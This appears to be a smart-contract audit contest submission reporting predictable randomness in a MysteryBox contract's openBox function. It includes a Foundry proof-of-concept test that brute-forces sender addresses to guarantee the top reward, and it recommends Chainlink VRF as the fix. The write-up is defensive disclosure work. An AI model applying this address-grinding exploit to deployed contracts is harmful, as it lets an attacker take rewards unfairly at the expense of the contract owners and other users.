Submission Details
Severity:
Pseudorandom Number using `block.timestamp` and `msg.sender` for randomness in `MysteryBox::openBox`
Summary
MysteryBox::openBox::randomValue is calculated using the hash of block.timestamp and msg.sender.
This value is used to decide the rarity of the reward given to the user.
uint256 randomValue = uint256(keccak256(abi.encodePacked(block.timestamp, msg.sender))) % 100;
Impact
A user can predict the rarity of a reward before it is claimed or manipulate msg.sender to receive a higher reward.
Proof of Concept
Validators can know the
block.timestampahead of time and use it to know how and when to participate.Users can manipulate their
msg.sendervalue to change the outcome of the draw.
Test Code:
import "@openzeppelin/contracts/utils/Strings.sol";
function testGetBestCoin() public {
address user;
uint256 randomValue;
uint256 index;
uint256 boxPrice = mysteryBox.boxPrice();
while(randomValue != 99) {
user = makeAddr(Strings.toString(index));
randomValue = uint256(keccak256(abi.encodePacked(block.timestamp, user))) % 100;
index += 1;
}
vm.deal(user, 1 ether);
vm.startPrank(user);
mysteryBox.buyBox{value: boxPrice}();
mysteryBox.openBox();
MysteryBox.Reward[] memory rewards = mysteryBox.getRewards();
console.log("Reward: ", rewards[0].name, rewards[0].value / 1e18, "ether");
}
Test Output:
Reward: Gold Coin 1 ether
Tools Used
Manual Review, Slither, Foundry
Recommendations
Use an off-chain oracle for randomness, such as Chainlink VRF.
Rewards breakdown
nSLOC
86This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.